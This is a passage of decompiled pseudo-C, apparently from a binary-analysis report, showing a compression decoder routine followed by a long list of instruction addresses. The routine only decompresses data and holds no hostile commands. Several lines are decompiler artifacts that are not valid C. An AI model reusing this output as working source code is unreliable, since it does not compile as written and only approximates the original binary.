											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                                                                        0x00000000
                                                                                                        0x00406131
                                                                                                        0x00406131
                                                                                                        0x00406136
                                                                                                        0x004061ad
                                                                                                        0x004061b4
                                                                                                        0x004061be
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x004067a0
                                                                                                        0x004067a0
                                                                                                        0x004067a6
                                                                                                        0x004067ac
                                                                                                        0x004067b2
                                                                                                        0x004067cc
                                                                                                        0x004067cf
                                                                                                        0x004067d5
                                                                                                        0x004067e0
                                                                                                        0x004067e2
                                                                                                        0x004067b4
                                                                                                        0x004067b4
                                                                                                        0x004067c3
                                                                                                        0x004067c7
                                                                                                        0x004067c7
                                                                                                        0x004067ec
                                                                                                        0x00406813
                                                                                                        0x00406813
                                                                                                        0x00406819
                                                                                                        0x00406819
                                                                                                        0x00000000
                                                                                                        0x004067ee
                                                                                                        0x004067ee
                                                                                                        0x004067f2
                                                                                                        0x004069a1
                                                                                                        0x00000000
                                                                                                        0x004069a1
                                                                                                        0x004067fe
                                                                                                        0x00406805
                                                                                                        0x0040680d
                                                                                                        0x00406810
                                                                                                        0x00000000
                                                                                                        0x00406810
                                                                                                        0x00406138
                                                                                                        0x00406138
                                                                                                        0x0040613c
                                                                                                        0x00406144
                                                                                                        0x00406147
                                                                                                        0x00406149
                                                                                                        0x0040614c
                                                                                                        0x0040614e
                                                                                                        0x00406153
                                                                                                        0x00406156
                                                                                                        0x0040615d
                                                                                                        0x00406164
                                                                                                        0x00406167
                                                                                                        0x00406172
                                                                                                        0x0040617a
                                                                                                        0x0040617a
                                                                                                        0x00406174
                                                                                                        0x00406174
                                                                                                        0x00406174
                                                                                                        0x00406169
                                                                                                        0x00406169
                                                                                                        0x00406169
                                                                                                        0x00406181
                                                                                                        0x0040619f
                                                                                                        0x004061a1
                                                                                                        0x00406374
                                                                                                        0x00406374
                                                                                                        0x00406377
                                                                                                        0x0040637a
                                                                                                        0x0040637d
                                                                                                        0x00406380
                                                                                                        0x00406383
                                                                                                        0x00406386
                                                                                                        0x00406389
                                                                                                        0x0040638c
                                                                                                        0x00406392
                                                                                                        0x004063aa
                                                                                                        0x004063ad
                                                                                                        0x004063b0
                                                                                                        0x004063b3
                                                                                                        0x004063b3
                                                                                                        0x004063b6
                                                                                                        0x004063bc
                                                                                                        0x00406394
                                                                                                        0x00406394
                                                                                                        0x0040639c
                                                                                                        0x004063a1
                                                                                                        0x004063a3
                                                                                                        0x004063a5
                                                                                                        0x004063a5
                                                                                                        0x004063c6
                                                                                                        0x004063c9
                                                                                                        0x0040636c
                                                                                                        0x00406372
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004063cb
                                                                                                        0x00406347
                                                                                                        0x0040634b
                                                                                                        0x00406953
                                                                                                        0x00000000
                                                                                                        0x00406953
                                                                                                        0x00406351
                                                                                                        0x00406354
                                                                                                        0x00406357
                                                                                                        0x0040635b
                                                                                                        0x0040635e
                                                                                                        0x00406364
                                                                                                        0x00406366
                                                                                                        0x00406366
                                                                                                        0x00406369
                                                                                                        0x00000000
                                                                                                        0x00406369
                                                                                                        0x00406183
                                                                                                        0x00406183
                                                                                                        0x00406186
                                                                                                        0x0040618c
                                                                                                        0x0040618e
                                                                                                        0x0040618e
                                                                                                        0x00406191
                                                                                                        0x00406194
                                                                                                        0x00406196
                                                                                                        0x00406197
                                                                                                        0x0040619a
                                                                                                        0x00406207
                                                                                                        0x00406207
                                                                                                        0x0040620b
                                                                                                        0x0040620e
                                                                                                        0x00406211
                                                                                                        0x00406214
                                                                                                        0x00406217
                                                                                                        0x00406218
                                                                                                        0x0040621b
                                                                                                        0x0040621d
                                                                                                        0x00406223
                                                                                                        0x00406226
                                                                                                        0x00406229
                                                                                                        0x0040622c
                                                                                                        0x0040622f
                                                                                                        0x00406235
                                                                                                        0x00406251
                                                                                                        0x00406254
                                                                                                        0x00406257
                                                                                                        0x0040625a
                                                                                                        0x00406261
                                                                                                        0x00406267
                                                                                                        0x0040626b
                                                                                                        0x00406237
                                                                                                        0x00406237
                                                                                                        0x0040623b
                                                                                                        0x00406243
                                                                                                        0x00406248
                                                                                                        0x0040624a
                                                                                                        0x0040624c
                                                                                                        0x0040624c
                                                                                                        0x00406275
                                                                                                        0x00406278
                                                                                                        0x004061ef
                                                                                                        0x004061ef
                                                                                                        0x004061f5
                                                                                                        0x004062a8
                                                                                                        0x004062ae
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004062b0
                                                                                                        0x004062b3
                                                                                                        0x004062b6
                                                                                                        0x004062b9
                                                                                                        0x004062bc
                                                                                                        0x004062bf
                                                                                                        0x004062c2
                                                                                                        0x004062c5
                                                                                                        0x004062c8
                                                                                                        0x004062ce
                                                                                                        0x004062e6
                                                                                                        0x004062e9
                                                                                                        0x004062ec
                                                                                                        0x004062ef
                                                                                                        0x004062ef
                                                                                                        0x004062f2
                                                                                                        0x004062f8
                                                                                                        0x004062d0
                                                                                                        0x004062d0
                                                                                                        0x004062d8
                                                                                                        0x004062dd
                                                                                                        0x004062df
                                                                                                        0x004062e1
                                                                                                        0x004062e1
                                                                                                        0x00406302
                                                                                                        0x00406305
                                                                                                        0x00406283
                                                                                                        0x00406287
                                                                                                        0x00406947
                                                                                                        0x00000000
                                                                                                        0x00406947
                                                                                                        0x0040628d
                                                                                                        0x00406290
                                                                                                        0x00406293
                                                                                                        0x00406297
                                                                                                        0x0040629a
                                                                                                        0x004062a0
                                                                                                        0x004062a2
                                                                                                        0x004062a2
                                                                                                        0x004062a5
                                                                                                        0x004062a5
                                                                                                        0x00406305
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x00406310
                                                                                                        0x00406310
                                                                                                        0x00406313
                                                                                                        0x00406316
                                                                                                        0x0040631a
                                                                                                        0x0040695f
                                                                                                        0x00000000
                                                                                                        0x0040695f
                                                                                                        0x00406320
                                                                                                        0x00406323
                                                                                                        0x00406326
                                                                                                        0x00406329
